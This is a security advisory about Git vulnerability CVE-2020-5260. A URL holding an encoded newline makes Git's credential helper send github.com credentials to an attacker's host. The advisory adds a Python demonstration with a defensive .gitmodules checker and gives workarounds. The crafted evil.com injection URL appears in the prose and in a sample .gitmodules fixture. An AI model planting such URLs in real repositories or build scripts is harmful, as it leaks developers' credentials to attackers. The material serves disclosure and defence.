Git credential leak vulnerability

Corrective releases of the distributed source control system Git have been published: 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" handler that causes credentials to be sent to the wrong host when a git client accesses a repository through a specially formatted URL containing a newline character. The vulnerability can be used to arrange for credentials belonging to another host to be sent to a server controlled by the attacker.

When a URL such as "https://evil.com?%0ahost=github.com/" is specified, the credential handler, while connecting to the host evil.com, will pass along the authentication parameters specified for github.com. The problem occurs during operations such as "git clone", including the processing of submodule URLs (for example, "git submodule update" will automatically process the URLs listed in the repository's .gitmodules file). The vulnerability is most dangerous in situations where a developer clones a repository without seeing the URL, for example when working with submodules, or in systems that perform automated actions, for example in package build scripts.

To block the vulnerability, the new versions forbid passing a newline character in any value transmitted through the credential exchange protocol. For distributions, the release of package updates can be tracked on the pages for Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch and FreeBSD.
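
The field injection described above and the newline check applied by the fixed releases, as an added Python example that is not taken from the article or from Git's source. The URL splitting and the helper's "last value wins" parsing are simplified assumptions, and the .gitmodules sample is constructed around the URL quoted above.

```python
import re
from urllib.parse import unquote

# Constructed sample .gitmodules; the second URL is the one quoted in the article.
SAMPLE_GITMODULES = '''\
[submodule "docs"]
    path = docs
    url = https://example.org/project/docs.git
[submodule "vendor"]
    path = vendor
    url = https://evil.com?%0ahost=github.com/
'''

def split_url(url):
    """Simplified model (assumption, not Git's parser): the host is everything
    between '://' and the first '/', percent-decoded."""
    scheme, _, rest = url.partition("://")
    host, _, path = rest.partition("/")
    return {"protocol": scheme, "host": unquote(host), "path": unquote(path)}

def serialize(fields, strict=True):
    """Build the newline-delimited key=value block handed to a credential helper.
    strict=True mirrors the fix: no value may contain a newline."""
    if strict:
        for key, value in fields.items():
            if "\n" in value or "\r" in value:
                raise ValueError(f"newline in credential field {key!r}")
    return "".join(f"{k}={v}\n" for k, v in fields.items())

def helper_view(block):
    """Assumed line-oriented helper: one key=value per line, last one wins."""
    seen = {}
    for line in block.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            seen[key] = value
    return seen

def audit_gitmodules(text):
    """Return submodule URLs whose decoded form contains CR or LF."""
    urls = re.findall(r"^\s*url\s*=\s*(\S+)\s*$", text, flags=re.M)
    return [u for u in urls if re.search(r"[\r\n]", unquote(u))]

if __name__ == "__main__":
    for url in audit_gitmodules(SAMPLE_GITMODULES):
        print("rejecting submodule URL:", url)
        unchecked = serialize(split_url(url), strict=False)
        print("helper would see:", helper_view(unchecked))
```

Running `audit_gitmodules` over a checked-out .gitmodules file before any submodule update gives a build script a way to refuse such URLs even on an unpatched client.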

As a workaround, it is recommended not to use credential.helper when accessing public repositories and not to use "git clone" in "--recurse-submodules" mode with unverified repositories. To completely disable the credential.helper handler, which stores and retrieves passwords from a cache, protected storage or a file with passwords, you can use the commands:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru
